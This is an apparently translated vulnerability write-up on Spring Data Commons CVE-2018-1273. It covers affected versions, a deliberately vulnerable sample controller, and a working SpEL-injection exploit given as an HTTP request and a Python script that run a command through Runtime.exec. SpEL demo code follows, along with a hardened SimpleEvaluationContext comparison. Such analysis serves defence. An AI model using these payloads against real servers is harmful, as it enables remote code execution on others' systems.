
What is the vulnerability analysis of Spring-data-commons CVE-2018-1273?

2025-02-23 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 05/31 Report

Many newcomers are not clear on how the Spring-data-commons CVE-2018-1273 vulnerability works. To help with that, the following explains it in detail; anyone who needs it can follow along, and I hope you find it useful.

Preface

CVE-2018-1273 is a recently disclosed remote code execution vulnerability in Spring-data-commons. To understand the details, this article explains it from three angles: the cause of the vulnerability, how to determine whether a project is affected, and how it is exploited.

The cause of the vulnerability

When a project uses the web features of Spring-data to bind the user's input parameters automatically, the key (the parameter name) of the form submitted by the user is evaluated as SpEL. That step is the trigger point of this vulnerability.

Determining whether a project is vulnerable

Verify that the target project contains the Spring-data-commons package and that its version falls within one of the following ranges:

- Spring Data Commons 1.13 to 1.13.10
- Spring Data Commons 2.0 to 2.0.5

Check whether the relevant feature is enabled:

1. `@EnableSpringDataWebSupport` is explicitly declared.

2. `@EnableSpringDataWebSupport` is not explicitly declared, but the project relies on spring-boot's automatic scanning. With Spring-boot's automatic scanning, the SpringDataWebConfiguration class is loaded automatically at startup, which has the same effect as above.

3. In a project configured without annotations, the feature is also deemed enabled if the equivalent declaration is present.

Then check the handlers annotated with @RequestMapping: the method parameter must be a custom interface (Interface).

Target code that meets all of the above conditions looks like this:

```java
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;

@SpringBootApplication
public class App {

    public static void main(String[] args) {
        SpringApplication.run(App.class);
    }

    // Handler whose parameter is a custom interface, so Spring Data's
    // ProxyingHandlerMethodArgumentResolver binds it (static so Spring can instantiate it)
    @Controller
    public static class TestController {
        @RequestMapping("test")
        public void CVEController(TestForm testForm) {
            System.out.println(testForm.getName());
        }
    }

    // The interface whose getter name becomes the bound form key
    interface TestForm {
        String getName();
    }
}
```

Exploitation

Based on the conditions identified above, the following request triggers the vulnerability:

1. Build an HTTP POST request.
2. Submit it as a form, so that our key is bound.
3. Place the payload in the name of the key.
4. The submitted key is `name`, from the getName() method above.
5. Append a SpEL snippet after name; the key then becomes something like name[T(java.lang.Runtime).getRuntime().exec("calc")]

The final payload is as follows:

```http
POST /test HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache

name%5BT(java.lang.Runtime).getRuntime().exec(%22calc%22)%5D=v
```

The same request as a simple python script:

```python
import http.client
import urllib.parse

command = "calc.exe"
# the SpEL snippet goes into the parameter name (the key), not the value
key = 'name[T(java.lang.Runtime).getRuntime().exec("%s")]' % command
params = urllib.parse.urlencode({key: 'v'})
headers = {"Content-type": "application/x-www-form-urlencoded"}
conn = http.client.HTTPConnection(host="localhost", port=8080)
conn.request("POST", "/test", params, headers)
conn.close()
```

In short, once the vulnerability conditions are met, only a specially crafted key needs to be sent.

How the Spring-data-commons vulnerability is triggered

The root cause of this vulnerability is that when Spring automatically binds user parameters, it uses SpelExpressionParser to parse the propertyName.

MapDataBinder.java, line 169:

```java
// Excerpt from MapDataBinder (setPropertyValue): propertyName comes straight from the request key
Expression expression = PARSER.parseExpression(propertyName);

PropertyPath leafProperty = getPropertyPath(propertyName).getLeafProperty();
TypeInformation<?> owningType = leafProperty.getOwningType();
TypeInformation<?> propertyType = owningType.getProperty(leafProperty.getSegment());

propertyType = propertyName.endsWith("]") ? propertyType.getActualType() : propertyType;

if (conversionRequired(value, propertyType.getType())) {

    PropertyDescriptor descriptor = BeanUtils.getPropertyDescriptor(owningType.getType(),
            leafProperty.getSegment());
    MethodParameter methodParameter = new MethodParameter(descriptor.getReadMethod(), -1);
    TypeDescriptor typeDescriptor = TypeDescriptor.nested(methodParameter, 0);

    value = conversionService.convert(value, TypeDescriptor.forObject(value), typeDescriptor);
}

// the parsed request key is evaluated here
expression.setValue(context, value);
```

So how does this MapDataBinder get called? Let's briefly look at how SpringMVC resolves parameters.

When the SpringDataWebConfiguration class is enabled, a ProxyingHandlerMethodArgumentResolver is registered with the container.

When SpringMVC receives a request, it iterates over the HandlerMethodArgumentResolvers registered in the container and calls their supportsParameter method. Since our parameter is an Interface, ProxyingHandlerMethodArgumentResolver tells the caller that it supports resolving this parameter, that is, supportsParameter returns true. In practice there are several additional checks, for example the interface must not be under the java package nor under the org.springframework package.

When ProxyingHandlerMethodArgumentResolver receives the parameter, it creates a MapDataBinder to bind it. The MapDataBinder.bind() method performs doBind, which eventually calls setPropertyValue, and the vulnerability is triggered at expression.setValue(context, value).

About Spring's SpEL

SpEL stands for Spring Expression Language; put simply, it is the expression language that ships with Spring. As the following code shows, Spring provides these features:

```java
import org.springframework.expression.Expression;
import org.springframework.expression.spel.SpelParserConfiguration;
import org.springframework.expression.spel.standard.SpelExpressionParser;

public class SpelExample {

    public static void main(String[] args) {
        SpelExample spelExample = new SpelExample();
        spelExample.supportValue();
        spelExample.supportClassMethod();
        spelExample.supportProperty();
        spelExample.supportArray();
        spelExample.supportCustomIndex();
        spelExample.supportCustomProperty();
        spelExample.runPlayLoad();
    }

    /** supports a literal value */
    public void supportValue() {
        SpelExpressionParser parser = new SpelExpressionParser(new SpelParserConfiguration(false, true));
        Expression exp = parser.parseExpression("'this is a value'");
        System.out.println(exp.getValue()); // this is a value
    }

    /** supports executing a java class method */
    public void supportClassMethod() {
        SpelExpressionParser parser = new SpelExpressionParser(new SpelParserConfiguration(false, true));
        Expression exp = parser.parseExpression("T(java.lang.Math).random() * 100.0");
        System.out.println(exp.getValue()); // returns a random number
    }

    /** supports assignment to the target object */
    public void supportProperty() {
        SpelExpressionParser parser = new SpelExpressionParser(new SpelParserConfiguration(false, true));
        Expression exp = parser.parseExpression("name='set my value'");
        MockClass mockClass = new MockClass();
        exp.getValue(mockClass);
        System.out.println(mockClass.name); // set my value
    }

    /** if the attribute is an array, it can be indexed */
    public void supportArray() {
        SpelExpressionParser parser = new SpelExpressionParser(new SpelParserConfiguration(false, true));
        Expression exp = parser.parseExpression("list[0]='list value'");
        MockClass mockClass = new MockClass();
        exp.getValue(mockClass);
        System.out.println(mockClass.list[0]); // list value
    }

    /**
     * The array subscript can itself be an expression.
     * Note: this is the key to malicious code execution.
     */
    public void supportCustomIndex() {
        SpelExpressionParser parser = new SpelExpressionParser(new SpelParserConfiguration(false, true));
        // T(java.lang.Math).abs(0) returns 0
        Expression exp = parser.parseExpression("list[T(java.lang.Math).abs(0)]='index is 0'");
        MockClass mockClass = new MockClass();
        exp.getValue(mockClass);
        System.out.println(mockClass.list[0]); // index is 0
    }

    /**
     * Can also read the value at a computed subscript of an array attribute.
     * This is what the vulnerability above exploits.
     */
    public void supportCustomProperty() {
        SpelExpressionParser parser = new SpelExpressionParser(new SpelParserConfiguration(false, true));
        // get the value at subscript 1 of the target object's list attribute
        Expression exp = parser.parseExpression("list[T(java.lang.Math).abs(1)]");
        MockClass mockClass = new MockClass();
        System.out.println(exp.getValue(mockClass)); // output 1
    }

    /** execute our code, pull up the calculator */
    public void runPlayLoad() {
        SpelExpressionParser parser = new SpelExpressionParser(new SpelParserConfiguration(false, true));
        // the index expression is evaluated (and the command runs) before the array lookup
        Expression exp = parser.parseExpression("list[T(java.lang.Runtime).getRuntime().exec(\"calc\")]");
        MockClass mockClass = new MockClass();
        System.out.println(exp.getValue(mockClass));
    }
}

class MockClass {
    // can only be assigned if it is declared as public
    public String name;
    public String[] list = new String[] {"0", "1"};
}
```
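The page's MapDataBinder excerpt and the SpEL examples both evaluate an untrusted property name with a full-power evaluation context; the fixed Spring Data Commons releases (1.13.11 and 2.0.6) switched the binder to SimpleEvaluationContext instead. The following is an added example, not code from the article or from Spring, that evaluates the same kind of request key under both contexts; the FormBean class, the property string and the method names are constructed for this demo.

```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.Expression;
import org.springframework.expression.spel.SpelEvaluationException;
import org.springframework.expression.spel.SpelParserConfiguration;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class BinderContextComparison {

    // Constructed stand-in for the bound form object (same shape as MockClass above).
    public static class FormBean {
        public String name;
        public String[] list = new String[] {"0", "1"};
    }

    // Constructed property name as MapDataBinder receives it from a request key: the
    // array index is an arbitrary SpEL expression containing a T(...) type reference.
    static final String UNTRUSTED_PROPERTY = "list[T(java.lang.Math).abs(1)]";

    static final SpelExpressionParser PARSER =
            new SpelExpressionParser(new SpelParserConfiguration(false, true));

    // Vulnerable shape: StandardEvaluationContext resolves T(...) to any class on the
    // classpath and allows any public method call, so the index expression runs as code.
    static Object bindWithStandardContext(FormBean bean) {
        EvaluationContext ctx = new StandardEvaluationContext(bean);
        return PARSER.parseExpression(UNTRUSTED_PROPERTY).getValue(ctx);
    }

    // Hardened shape: the data-binding SimpleEvaluationContext has no type locator, so
    // T(...) is rejected before any method on the referenced class can be invoked.
    static String bindWithSimpleContext(FormBean bean) {
        EvaluationContext ctx = SimpleEvaluationContext.forReadWriteDataBinding().build();
        try {
            return String.valueOf(PARSER.parseExpression(UNTRUSTED_PROPERTY).getValue(ctx, bean));
        } catch (SpelEvaluationException e) {
            return "rejected: " + e.getMessageCode();
        }
    }

    public static void main(String[] args) {
        FormBean bean = new FormBean();
        System.out.println(bindWithStandardContext(bean));
        System.out.println(bindWithSimpleContext(bean));
        // Ordinary binding keys (plain property paths, literal indexes) still work under
        // the restricted context, which is why it is a drop-in replacement for binding.
        EvaluationContext safe = SimpleEvaluationContext.forReadWriteDataBinding().build();
        PARSER.parseExpression("list[0]").setValue(safe, bean, "bound");
        PARSER.parseExpression("name").setValue(safe, bean, "alice");
        System.out.println(bean.list[0] + " " + bean.name);
    }
}
```

Run it with spring-expression on the classpath; the first call returns the element at the computed index, the second reports the type-reference rejection, and the plain keys still bind.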
